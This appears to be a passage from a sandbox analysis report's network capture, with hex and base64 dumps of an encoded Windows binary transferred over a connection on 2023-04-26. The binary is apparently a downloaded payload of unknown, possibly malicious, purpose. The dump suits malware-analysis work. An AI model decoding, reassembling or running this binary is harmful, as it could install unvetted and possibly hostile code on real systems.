                                                                  2023-04-26 07:00:14 UTC1615INData Raw: 44 77 41 41 41 43 73 74 51 67 51 50 67 41 41 41 4c 61 31 43 42 41 32 20 41 41 41 41 77 4c 55 49 45 43 49 46 6b 78 6d 5a 41 41 41 41 51 48 38 4c 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 2f 2f 2f 2f 2f 38 4c 55 49 45 50 2f 2f 20 2f 2f 2f 36 74 51 67 51 41 51 41 41 41 41 53 32 43 42 41 42 41 41 41 41 44 72 59 49 45 41 4d 41 41 41 41 59 74 67 67 51 41 77 41 41 41 43 4b 32 43 42 41 46 41 41 41 41 4c 4c 59 49 45 41 55 41 41 41 41 32 74 67 67 51 42 77 41 41 20 41 45 43 32 43 42 41 48 41 41 41 41 53 72 59 49 45 50 2f 2f 2f 2f 39 55 74 67 67 51 43 67 41 41 41 46 36 32 43 42 41 4b 41 41 41 41 61 4c 59 49 45 41 77 41 41 41 42 79 74 67 67 51 44 41 41 41 41 48 79 32 43 42 41 4f 41 41 41 41 20
                                                                  Data Ascii: DwAAACstQgQPgAAALa1CBA2 AAAAwLUIECIFkxmZAAAAQH8LEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////8LUIEP// ///6tQgQAQAAAAS2CBABAAAADrYIEAMAAAAYtggQAwAAACK2CBAFAAAALLYIEAUAAAA2tggQBwAA AEC2CBAHAAAASrYIEP////9UtggQCgAAAF62CBAKAAAAaLYIEAwAAABytggQDAAAAHy2CBAOAAAA
                                                                  2023-04-26 07:00:14 UTC1631INData Raw: 53 66 73 47 45 41 41 41 41 41 44 2b 2f 2f 2f 2f 41 41 41 41 41 4e 54 2f 2f 2f 38 41 41 41 41 41 2f 76 2f 2f 2f 77 41 41 20 41 41 42 73 43 67 63 51 41 41 41 41 41 50 37 2f 2f 2f 38 41 41 41 41 41 32 50 2f 2f 2f 77 41 41 41 41 44 2b 2f 2f 2f 2f 41 41 41 41 41 4c 6b 46 42 78 41 41 41 41 41 41 2f 76 2f 2f 2f 77 41 41 41 41 44 55 2f 2f 2f 2f 41 41 41 41 20 41 50 37 2f 2f 2f 38 41 41 41 41 41 4f 52 59 48 45 41 41 41 41 41 44 2b 2f 2f 2f 2f 41 41 41 41 41 4e 44 2f 2f 2f 38 41 41 41 41 41 2f 76 2f 2f 2f 77 41 41 41 41 41 4f 55 41 63 51 41 41 41 41 41 50 37 2f 2f 2f 38 41 41 41 41 41 20 78 50 2f 2f 2f 77 41 41 41 41 44 2b 2f 2f 2f 2f 41 41 41 41 41 4a 70 54 42 78 41 41 41 41 41 41 2f 76 2f 2f 2f 77 41 41 41 41 44 51 2f 2f 2f 2f 41 41 41 41 41 50 37 2f 2f 2f 38 41
                                                                  Data Ascii: SfsGEAAAAAD+////AAAAANT///8AAAAA/v///wAA AABsCgcQAAAAAP7///8AAAAA2P///wAAAAD+////AAAAALkFBxAAAAAA/v///wAAAADU////AAAA AP7///8AAAAAORYHEAAAAAD+////AAAAAND///8AAAAA/v///wAAAAAOUAcQAAAAAP7///8AAAAA xP///wAAAAD+////AAAAAJpTBxAAAAAA/v///wAAAADQ////AAAAAP7///8A
                                                                  2023-04-26 07:00:14 UTC1643INData Raw: 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                  Data Ascii: AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA
                                                                  2023-04-26 07:00:14 UTC1659INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41
                                                                  Data Ascii: AAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA
                                                                  2023-04-26 07:00:14 UTC1675INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41
                                                                  Data Ascii: AAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA
                                                                  2023-04-26 07:00:14 UTC1691INData Raw: 56 56 74 62 32 35 6c 65 56 39 69 59 58 4e 6c 51 48 4e 30 5a 45 42 41 41 41 41 41 41 45 77 4f 43 52 41 41 20 41 41 41 41 4c 6a 39 42 56 58 52 70 62 57 56 66 59 6d 46 7a 5a 55 42 7a 64 47 52 41 51 41 41 41 41 41 41 41 54 41 34 4a 45 41 41 41 41 41 41 75 50 30 46 57 50 79 52 75 64 57 31 66 5a 32 56 30 51 46 39 58 56 6a 38 6b 61 58 4e 30 20 63 6d 56 68 62 57 4a 31 5a 6c 39 70 64 47 56 79 59 58 52 76 63 6b 42 66 56 31 55 2f 4a 47 4e 6f 59 58 4a 66 64 48 4a 68 61 58 52 7a 51 46 39 58 51 48 4e 30 5a 45 42 41 51 48 4e 30 5a 45 42 41 51 48 4e 30 5a 45 42 41 41 41 41 41 20 41 45 77 4f 43 52 41 41 41 41 41 41 4c 6a 39 42 56 6a 38 6b 62 6e 56 74 58 33 42 31 64 45 42 66 56 31 59 2f 4a 47 39 7a 64 48 4a 6c 59 57 31 69 64 57 5a 66 61 58 52 6c 63 6d 46 30 62 33 4a 41 58
                                                                  Data Ascii: VVtb25leV9iYXNlQHN0ZEBAAAAAAEwOCRAA AAAALj9BVXRpbWVfYmFzZUBzdGRAQAAAAAAATA4JEAAAAAAuP0FWPyRudW1fZ2V0QF9XVj8kaXN0 cmVhbWJ1Zl9pdGVyYXRvckBfV1U/JGNoYXJfdHJhaXRzQF9XQHN0ZEBAQHN0ZEBAQHN0ZEBAAAAA AEwOCRAAAAAALj9BVj8kbnVtX3B1dEBfV1Y/JG9zdHJlYW1idWZfaXRlcmF0b3JAX
                                                                  2023-04-26 07:00:14 UTC1707INData Raw: 4e 4d 55 30 30 6a 54 6b 4e 50 59 30 2b 6a 51 41 4e 53 41 31 4b 54 55 75 4e 54 34 31 51 7a 56 6f 4e 58 45 31 64 6a 57 47 4e 59 73 31 73 44 58 4d 4e 65 67 31 20 39 54 55 48 4e 68 67 32 52 6a 5a 53 4e 6e 6f 32 68 6a 61 4c 4e 70 73 32 6f 44 62 49 4e 74 45 32 31 6a 62 6d 4e 75 73 32 45 44 63 5a 4e 78 34 33 4c 6a 63 7a 4e 31 67 33 59 54 64 6d 4e 33 59 33 65 7a 65 67 4e 36 6b 33 72 6a 65 2b 20 4e 38 4d 33 30 6a 66 6a 4e 2f 55 33 43 6a 67 4f 4f 42 51 34 4e 44 67 39 4f 45 49 34 55 6a 68 58 4f 48 77 34 68 54 69 4b 4f 4a 6f 34 6e 7a 6a 45 4f 4d 30 34 30 6a 6a 69 4f 4f 63 34 44 44 6b 56 4f 52 6f 35 4b 6a 6b 76 4f 56 51 35 20 58 54 6c 69 4f 58 49 35 64 7a 6d 47 4f 5a 51 35 70 6a 6d 34 4f 62 77 35 77 6a 6e 69 4f 65 73 35 38 44 6b 41 4f 67 55 36 4b 6a 6f 7a 4f 6a 67 36
                                                                  Data Ascii: NMU00jTkNPY0+jQANSA1KTUuNT41QzVoNXE1djWGNYs1sDXMNeg1 9TUHNhg2RjZSNno2hjaLNps2oDbINtE21jbmNus2EDcZNx43LjczN1g3YTdmN3Y3ezegN6k3rje+ N8M30jfjN/U3CjgOOBQ4NDg9OEI4UjhXOHw4hTiKOJo4nzjEOM040jjiOOc4DDkVORo5KjkvOVQ5 XTliOXI5dzmGOZQ5pjm4Obw5wjniOes58DkAOgU6KjozOjg6
                                                                  2023-04-26 07:00:14 UTC1723INData Raw: 2f 61 44 39 2b 50 36 51 2f 36 6a 2f 79 50 77 41 41 41 50 41 43 41 4d 77 41 41 41 41 4e 4d 44 51 77 54 44 42 77 4d 49 73 77 6f 44 44 70 4d 50 55 77 2f 54 41 4b 4d 52 67 78 4a 44 45 70 4d 53 38 78 4e 6a 45 37 20 4d 55 51 78 55 6a 46 6e 4d 58 34 78 6c 44 47 66 4d 65 45 78 38 44 45 4d 4d 6a 4d 79 50 6a 4a 4d 4d 6d 63 79 64 54 4b 50 4d 70 67 79 74 7a 4b 2b 4d 74 59 79 43 54 4d 52 4d 79 6f 7a 51 7a 4e 63 4d 33 55 7a 6a 6a 4f 6e 4d 38 41 7a 20 32 6a 50 78 4d 77 67 30 48 7a 51 32 4e 45 30 30 5a 7a 53 66 4e 4b 6f 30 35 6a 54 7a 4e 41 51 31 52 6a 56 59 4e 58 59 31 74 6a 58 75 4e 66 59 31 44 54 5a 32 4e 6f 55 32 74 54 61 56 4e 35 34 33 70 44 66 76 4e 79 63 34 6f 6a 69 72 20 4f 41 51 35 58 7a 6e 55 4f 52 63 36 6e 44 72 58 4f 6c 51 37 31 6a 76 6f 4f 30 41 38 67 6a 7a
                                                                  Data Ascii: /aD9+P6Q/6j/yPwAAAPACAMwAAAANMDQwTDBwMIswoDDpMPUw/TAKMRgxJDEpMS8xNjE7 MUQxUjFnMX4xlDGfMeEx8DEMMjMyPjJMMmcydTKPMpgytzK+MtYyCTMRMyozQzNcM3UzjjOnM8Az 2jPxMwg0HzQ2NE00ZzSfNKo05jTzNAQ1RjVYNXY1tjXuNfY1DTZ2NoU2tTaVN543pDfvNyc4ojir OAQ5XznUORc6nDrXOlQ71jvoO0A8gjz
                                                                  2023-04-26 07:00:14 UTC1739INData Raw: 5a 4e 2b 4d 33 37 54 66 33 20 4e 77 45 34 43 7a 67 56 4f 42 38 34 4b 54 67 7a 4f 44 30 34 52 7a 68 52 4f 46 73 34 5a 54 68 76 4f 48 6b 34 67 7a 69 4e 4f 4a 63 34 6f 54 69 72 4f 4c 55 34 76 7a 6a 4a 4f 4e 4d 34 33 54 6a 6e 4f 50 45 34 2b 7a 67 46 4f 51 38 35 20 47 54 6b 6a 4f 53 30 35 4e 7a 6c 42 4f 55 73 35 56 54 6c 66 4f 57 6b 35 63 7a 6c 39 4f 59 63 35 6b 54 6d 62 4f 61 55 35 72 7a 6d 35 4f 63 4d 35 7a 54 6e 58 4f 65 45 35 36 7a 6e 31 4f 66 38 35 43 54 6f 54 4f 68 30 36 4a 7a 6f 78 20 4f 6a 73 36 52 54 70 50 4f 6c 6b 36 59 7a 70 74 4f 6e 63 36 67 54 71 4c 4f 70 55 36 6e 7a 71 70 4f 72 4d 36 76 54 72 48 4f 74 45 36 32 7a 72 6c 4f 75 38 36 2b 54 6f 44 4f 77 30 37 46 7a 73 68 4f 79 73 37 4e 54 73 2f 4f 30 6b 37 20 55 7a 74 64 4f 32 63 37 63 54 74 37 4f 34
                                                                  Data Ascii: ZN+M37Tf3 NwE4CzgVOB84KTgzOD04RzhROFs4ZThvOHk4gziNOJc4oTirOLU4vzjJONM43TjnOPE4+zgFOQ85 GTkjOS05NzlBOUs5VTlfOWk5czl9OYc5kTmbOaU5rzm5OcM5zTnXOeE56zn1Of85CToTOh06Jzox Ojs6RTpPOlk6YzptOnc6gTqLOpU6nzqpOrM6vTrHOtE62zrlOu86+ToDOw07FzshOys7NTs/O0k7 UztdO2c7cTt7O4
                                                                  2023-04-26 07:00:14 UTC1755INData Raw: 2f 49 50 39 41 2f 36 44 2f 34 50 2f 77 2f 41 41 41 41 6b 41 6f 41 4e 41 45 41 41 41 77 77 45 44 41 55 4d 42 67 77 20 48 44 41 6b 4d 44 77 77 54 44 42 51 4d 47 41 77 5a 44 42 6f 4d 47 77 77 63 44 42 34 4d 4a 41 77 6f 44 43 6b 4d 4c 51 77 75 44 43 38 4d 4d 41 77 78 44 44 49 4d 4d 77 77 31 44 44 73 4d 50 41 77 43 44 45 59 4d 52 77 78 49 44 45 6b 20 4d 53 67 78 4c 44 46 41 4d 55 51 78 56 44 46 59 4d 56 77 78 59 44 46 6b 4d 57 67 78 62 44 46 30 4d 59 77 78 6e 44 47 67 4d 62 41 78 74 44 47 34 4d 62 77 78 77 44 48 45 4d 63 77 78 35 44 48 30 4d 66 67 78 43 44 49 4d 4d 68 41 79 20 46 44 49 59 4d 69 41 79 4f 44 4a 49 4d 6b 77 79 58 44 4a 67 4d 6e 41 79 64 44 4a 38 4d 70 51 79 70 44 4b 6f 4d 72 67 79 76 44 4c 41 4d 73 67 79 34 44 49 4d 50 42 51 38 53 44 78 59 50 47
                                                                  Data Ascii: /IP9A/6D/4P/w/AAAAkAoANAEAAAwwEDAUMBgw HDAkMDwwTDBQMGAwZDBoMGwwcDB4MJAwoDCkMLQwuDC8MMAwxDDIMMww1DDsMPAwCDEYMRwxIDEk MSgxLDFAMUQxVDFYMVwxYDFkMWgxbDF0MYwxnDGgMbAxtDG4MbwxwDHEMcwx5DH0MfgxCDIMMhAy FDIYMiAyODJIMkwyXDJgMnAydDJ8MpQypDKoMrgyvDLAMsgy4DIMPBQ8SDxYPG
                                                                  2023-04-26 07:00:14 UTC1771INData Raw: 51 2f 62 44 39 30 50 33 77 2f 68 44 2b 4d 50 35 51 2f 6e 44 2b 6b 50 36 77 2f 74 44 2b 38 50 38 51 2f 7a 44 2f 55 50 39 77 2f 20 35 44 2f 73 50 2f 51 2f 2f 44 38 41 63 41 73 41 32 41 4d 41 41 41 51 77 44 44 41 55 4d 42 77 77 4a 44 41 73 4d 44 51 77 50 44 42 45 4d 45 77 77 56 44 42 63 4d 47 51 77 62 44 42 30 4d 48 77 77 68 44 43 4d 4d 4a 51 77 6e 44 43 6b 20 4d 4b 77 77 74 44 43 38 4d 4d 51 77 7a 44 44 55 4d 4e 77 77 35 44 44 73 4d 50 51 77 2f 44 41 45 4d 51 77 78 46 44 45 63 4d 53 51 78 4c 44 45 30 4d 54 77 78 52 44 46 4d 4d 56 51 78 58 44 46 6b 4d 57 77 78 64 44 46 38 4d 59 51 78 20 6a 44 47 55 4d 5a 77 78 70 44 47 73 4d 62 51 78 76 44 48 45 4d 63 77 78 31 44 48 63 4d 65 51 78 37 44 48 30 4d 66 77 78 42 44 49 4d 4d 68 51 79 48 44 49 6b 4d 69 77 79 4e 44
                                                                  Data Ascii: Q/bD90P3w/hD+MP5Q/nD+kP6w/tD+8P8Q/zD/UP9w/ 5D/sP/Q//D8AcAsA2AMAAAQwDDAUMBwwJDAsMDQwPDBEMEwwVDBcMGQwbDB0MHwwhDCMMJQwnDCk MKwwtDC8MMQwzDDUMNww5DDsMPQw/DAEMQwxFDEcMSQxLDE0MTwxRDFMMVQxXDFkMWwxdDF8MYQx jDGUMZwxpDGsMbQxvDHEMcwx1DHcMeQx7DH0MfwxBDIMMhQyHDIkMiwyND
                                                                  2023-04-26 07:00:14 UTC1787INData Raw: 77 77 41 41 46 41 4d 41 41 42 52 44 41 41 41 55 67 77 41 41 46 4d 4d 41 41 42 55 44 41 41 41 56 51 77 41 41 46 59 4d 41 41 42 58 44 41 41 41 57 41 77 41 41 46 6b 4d 41 41 42 61 20 44 41 41 41 57 77 77 41 41 46 77 4d 41 41 42 64 44 41 41 41 58 67 77 41 41 46 38 4d 41 41 42 67 44 41 41 41 59 51 77 41 41 47 49 4d 41 41 42 6a 44 41 41 41 5a 41 77 41 41 47 55 4d 41 41 42 6d 44 41 41 41 5a 77 77 41 41 47 67 4d 20 41 41 42 70 44 41 41 41 61 67 77 41 41 47 73 4d 41 41 42 73 44 41 41 41 62 51 77 41 41 47 34 4d 41 41 42 76 44 41 41 41 63 41 77 41 41 48 45 4d 41 41 42 79 44 41 41 41 63 77 77 41 41 48 51 4d 41 41 42 31 44 41 41 41 64 67 77 41 20 41 48 63 4d 41 41 42 34 44 41 41 41 65 51 77 41 41 48 6f 4d 41 41 42 37 44 41 41 41 66 41 77 41 41 48 30 4d 41 41 42 2b 44
                                                                  Data Ascii: wwAAFAMAABRDAAAUgwAAFMMAABUDAAAVQwAAFYMAABXDAAAWAwAAFkMAABa DAAAWwwAAFwMAABdDAAAXgwAAF8MAABgDAAAYQwAAGIMAABjDAAAZAwAAGUMAABmDAAAZwwAAGgM AABpDAAAagwAAGsMAABsDAAAbQwAAG4MAABvDAAAcAwAAHEMAAByDAAAcwwAAHQMAAB1DAAAdgwA AHcMAAB4DAAAeQwAAHoMAAB7DAAAfAwAAH0MAAB+D
                                                                  2023-04-26 07:00:14 UTC1803INData Raw: 41 49 54 41 64 52 46 71 54 32 69 34 68 67 67 51 75 55 78 68 43 68 44 6f 49 54 77 43 41 4d 5a 46 2f 45 44 6f 6d 45 41 43 41 49 76 49 68 63 6b 50 68 4a 51 4b 41 41 43 4c 41 66 39 51 44 49 50 41 45 4b 4e 51 59 51 6f 51 78 6b 58 38 20 51 62 6c 51 59 51 6f 51 61 48 79 42 43 42 44 6f 62 6c 4d 43 41 49 54 41 64 52 46 71 41 32 68 38 67 51 67 51 75 56 42 68 43 68 44 6f 32 54 73 43 41 4d 5a 46 2f 45 4c 6f 55 45 41 43 41 49 76 49 68 63 6b 50 68 45 77 4b 41 41 43 4c 20 41 66 39 51 44 49 50 41 45 4b 4e 55 59 51 6f 51 78 6b 58 38 52 4f 67 77 51 41 49 41 69 38 69 46 79 51 2b 45 4c 41 6f 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 31 68 68 43 68 44 47 52 66 78 47 36 42 42 41 41 67 43 4c 79 49 58 4a 20 44 34 51 4d 43 67 41 41 69 77 48 2f 55 41 79 44 77 42 43 6a 58 47 45 4b
                                                                  Data Ascii: AITAdRFqT2i4hggQuUxhChDoITwCAMZF/EDomEACAIvIhckPhJQKAACLAf9QDIPAEKNQYQoQxkX8 QblQYQoQaHyBCBDoblMCAITAdRFqA2h8gQgQuVBhChDo2TsCAMZF/ELoUEACAIvIhckPhEwKAACL Af9QDIPAEKNUYQoQxkX8ROgwQAIAi8iFyQ+ELAoAAIsB/1AMg8AQo1hhChDGRfxG6BBAAgCLyIXJ D4QMCgAAiwH/UAyDwBCjXGEK
                                                                  2023-04-26 07:00:14 UTC1819INData Raw: 41 4d 5a 46 2f 48 37 6f 54 42 45 43 41 49 76 49 20 68 63 6b 50 68 48 6f 4a 41 41 43 4c 41 66 39 51 44 49 50 41 45 4b 50 59 62 77 6f 51 78 6b 58 38 66 37 6e 59 62 77 6f 51 61 4a 69 4a 43 42 44 6f 49 69 51 43 41 49 54 41 64 52 46 71 41 6d 69 59 69 51 67 51 75 64 68 76 43 68 44 6f 20 6a 51 77 43 41 4d 5a 46 2f 49 44 6f 42 42 45 43 41 49 76 49 68 63 6b 50 68 44 49 4a 41 41 43 4c 41 66 39 51 44 49 50 41 45 4b 50 63 62 77 6f 51 78 6b 58 38 67 6d 70 59 61 67 42 6f 34 47 38 4b 45 4f 6a 62 61 51 51 41 67 38 51 49 20 75 67 4d 41 41 41 43 35 35 47 38 4b 45 4f 68 4a 4b 51 49 41 67 38 51 45 78 6b 58 38 67 38 63 46 4f 48 41 4b 45 4b 53 42 43 42 44 48 42 54 78 77 43 68 41 4a 41 41 41 41 36 4b 6b 51 41 67 43 4c 79 49 58 4a 44 34 54 58 43 41 41 41 20 69 77 48 2f 55 41 79
                                                                  Data Ascii: AMZF/H7oTBECAIvI hckPhHoJAACLAf9QDIPAEKPYbwoQxkX8f7nYbwoQaJiJCBDoIiQCAITAdRFqAmiYiQgQudhvChDo jQwCAMZF/IDoBBECAIvIhckPhDIJAACLAf9QDIPAEKPcbwoQxkX8gmpYagBo4G8KEOjbaQQAg8QI ugMAAAC55G8KEOhJKQIAg8QExkX8g8cFOHAKEKSBCBDHBTxwChAJAAAA6KkQAgCLyIXJD4TXCAAA iwH/UAy
                                                                  2023-04-26 07:00:14 UTC1835INData Raw: 34 42 41 4d 5a 46 2f 44 6a 6f 71 4f 49 42 41 49 76 49 68 63 6b 50 68 4d 51 51 41 41 43 4c 41 66 39 51 44 49 50 41 45 4b 4e 41 67 41 6f 51 78 6b 58 38 4f 62 6c 41 67 41 6f 51 20 61 4f 43 43 43 42 44 6f 66 76 55 42 41 49 54 41 64 52 46 71 41 32 6a 67 67 67 67 51 75 55 43 41 43 68 44 6f 36 64 30 42 41 4d 5a 46 2f 44 72 6f 59 4f 49 42 41 49 76 49 68 63 6b 50 68 48 77 51 41 41 43 4c 41 66 39 51 44 49 50 41 20 45 4b 4e 45 67 41 6f 51 78 6b 58 38 50 4f 68 41 34 67 45 41 69 38 69 46 79 51 2b 45 58 42 41 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 30 69 41 43 68 44 47 52 66 77 2b 36 43 44 69 41 51 43 4c 79 49 58 4a 44 34 51 38 45 41 41 41 20 69 77 48 2f 55 41 79 44 77 42 43 6a 54 49 41 4b 45 4d 5a 46 2f 45 42 71 50 47 6f 41 61 46 43 41 43 68 44 6f 39 7a 6f 45 41 49
                                                                  Data Ascii: 4BAMZF/DjoqOIBAIvIhckPhMQQAACLAf9QDIPAEKNAgAoQxkX8OblAgAoQ aOCCCBDofvUBAITAdRFqA2jggggQuUCAChDo6d0BAMZF/DroYOIBAIvIhckPhHwQAACLAf9QDIPA EKNEgAoQxkX8POhA4gEAi8iFyQ+EXBAAAIsB/1AMg8AQo0iAChDGRfw+6CDiAQCLyIXJD4Q8EAAA iwH/UAyDwBCjTIAKEMZF/EBqPGoAaFCAChDo9zoEAI
                                                                  2023-04-26 07:00:14 UTC1851INData Raw: 47 59 49 45 4c 6b 45 6a 41 6f 51 36 4d 61 75 41 51 44 47 52 66 77 66 78 67 55 49 6a 41 6f 51 41 63 5a 46 2f 43 44 48 42 51 79 4d 43 68 41 43 41 41 41 41 36 43 69 7a 41 51 43 4c 79 49 58 4a 44 34 53 74 49 77 41 41 69 77 48 2f 20 55 41 79 44 77 42 43 6a 45 49 77 4b 45 4d 5a 46 2f 43 47 35 45 49 77 4b 45 47 68 41 6c 41 67 51 36 50 37 46 41 51 43 45 77 48 55 52 61 69 6c 6f 51 4a 51 49 45 4c 6b 51 6a 41 6f 51 36 47 6d 75 41 51 44 47 52 66 77 69 36 4f 43 79 20 41 51 43 4c 79 49 58 4a 44 34 52 6c 49 77 41 41 69 77 48 2f 55 41 79 44 77 42 43 6a 46 49 77 4b 45 4d 5a 46 2f 43 4f 35 46 49 77 4b 45 47 67 59 67 77 67 51 36 4c 62 46 41 51 43 45 77 48 55 52 61 67 4a 6f 47 49 4d 49 45 4c 6b 55 20 6a 41 6f 51 36 43 47 75 41 51 44 47 52 66 77 6b 36 4a 69 79 41 51 43 4c 79
                                                                  Data Ascii: GYIELkEjAoQ6MauAQDGRfwfxgUIjAoQAcZF/CDHBQyMChACAAAA6CizAQCLyIXJD4StIwAAiwH/ UAyDwBCjEIwKEMZF/CG5EIwKEGhAlAgQ6P7FAQCEwHURailoQJQIELkQjAoQ6GmuAQDGRfwi6OCy AQCLyIXJD4RlIwAAiwH/UAyDwBCjFIwKEMZF/CO5FIwKEGgYgwgQ6LbFAQCEwHURagJoGIMIELkU jAoQ6CGuAQDGRfwk6JiyAQCLy
                                                                  2023-04-26 07:00:14 UTC1867INData Raw: 6b 58 38 61 4f 6a 71 67 77 45 41 69 38 69 46 20 79 51 2b 45 51 77 59 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 33 43 57 43 68 44 47 52 66 78 71 36 4d 71 44 41 51 43 4c 79 49 58 4a 44 34 51 6a 42 67 41 41 69 77 48 2f 55 41 79 44 77 42 43 6a 64 4a 59 4b 45 4d 5a 46 2f 47 78 71 20 57 47 6f 41 61 48 69 57 43 68 44 6f 6f 64 77 44 41 49 50 45 43 4c 6f 44 41 41 41 41 75 58 79 57 43 68 44 6f 44 35 77 42 41 49 50 45 42 4d 5a 46 2f 47 33 48 42 64 43 57 43 68 44 51 67 67 67 51 78 77 58 55 6c 67 6f 51 41 67 41 41 20 41 4f 68 76 67 77 45 41 69 38 69 46 79 51 2b 45 79 41 55 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 39 69 57 43 68 44 47 52 66 78 75 75 64 69 57 43 68 42 6f 6d 4a 51 49 45 4f 68 46 6c 67 45 41 68 4d 42 31 45 57 6f 36 61 4a 69 55 20 43 42 43 35 32 4a 59 4b
                                                                  Data Ascii: kX8aOjqgwEAi8iF yQ+EQwYAAIsB/1AMg8AQo3CWChDGRfxq6MqDAQCLyIXJD4QjBgAAiwH/UAyDwBCjdJYKEMZF/Gxq WGoAaHiWChDoodwDAIPECLoDAAAAuXyWChDoD5wBAIPEBMZF/G3HBdCWChDQgggQxwXUlgoQAgAA AOhvgwEAi8iFyQ+EyAUAAIsB/1AMg8AQo9iWChDGRfxuudiWChBomJQIEOhFlgEAhMB1EWo6aJiU CBC52JYK
                                                                  2023-04-26 07:00:14 UTC1883INData Raw: 43 42 43 35 4e 4b 4d 4b 45 4f 67 47 55 41 45 41 78 6b 58 38 57 65 68 39 56 41 45 41 69 38 69 46 20 79 51 2b 45 49 51 6b 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 7a 69 6a 43 68 44 47 52 66 78 61 75 54 69 6a 43 68 42 6f 63 47 59 49 45 4f 68 54 5a 77 45 41 68 4d 42 31 45 57 6f 41 61 48 42 6d 43 42 43 35 4f 4b 4d 4b 45 4f 69 2b 20 54 77 45 41 78 6b 58 38 57 2b 67 31 56 41 45 41 69 38 69 46 79 51 2b 45 32 51 67 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 7a 79 6a 43 68 44 47 52 66 78 63 75 54 79 6a 43 68 42 6f 63 47 59 49 45 4f 67 4c 5a 77 45 41 68 4d 42 31 20 45 57 6f 41 61 48 42 6d 43 42 43 35 50 4b 4d 4b 45 4f 68 32 54 77 45 41 78 6b 58 38 58 65 6a 74 55 77 45 41 69 38 69 46 79 51 2b 45 6b 51 67 41 41 49 73 42 2f 31 41 4d 67 38 41 51 6f 30 43 6a 43 68 44 47
